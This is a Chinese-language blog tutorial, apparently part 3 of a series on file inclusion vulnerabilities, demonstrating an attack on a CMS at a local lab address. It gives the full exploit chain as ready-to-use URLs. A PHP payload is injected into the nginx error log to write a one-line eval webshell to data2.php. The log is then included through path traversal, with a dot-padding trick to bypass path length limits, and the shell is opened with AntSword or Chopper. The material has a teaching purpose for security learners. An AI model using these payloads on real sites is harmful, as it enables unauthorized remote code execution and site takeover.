前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >任意文件包含漏洞(3)——实战某cms

任意文件包含漏洞(3)——实战某cms

作者头像
宸寰客
发布2020-08-25 16:10:11
1.1K0
发布2020-08-25 16:10:11
举报
文章被收录于专栏:yuancao博客yuancao博客

资源下载

至少有一个任意文件包含漏洞的cms

错误日志

nginx的默认日志文件是phpstudy/nginx/logs/error.log

apache的日志文件是phpstudy/apache/logs/error.log 一般管理员都不会改的 这里我用的是nginx

在这里插入图片描述
在这里插入图片描述

演示

进入网站首页

在这里插入图片描述
在这里插入图片描述

在url后面加上<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>');?> 或者其他的一句话木马

代码语言:javascript
复制
http://172.16.11.27/xhcms/%3C?php%20fputs(fopen(%27data2.php%27,%27w%27),%27%3C?php%20eval($_POST[123])?%3E%27);?%3E
在这里插入图片描述
在这里插入图片描述

查看日志文件

代码语言:javascript
复制
http://172.16.11.27/xhcms/?r=../../../nginx/logs/error.log...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
在这里插入图片描述
在这里插入图片描述

经过代码审计,这里还需要使用.,路径长度绕过

在这里插入图片描述
在这里插入图片描述

发现 index.php的同目录下生成了data2.php文件

在这里插入图片描述
在这里插入图片描述

用蚁剑或者菜刀连接该文件

代码语言:javascript
复制
http://172.16.11.27/xhcms/data2.php
在这里插入图片描述
在这里插入图片描述
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2020-08-23 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 资源下载
  • 错误日志
  • 演示
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档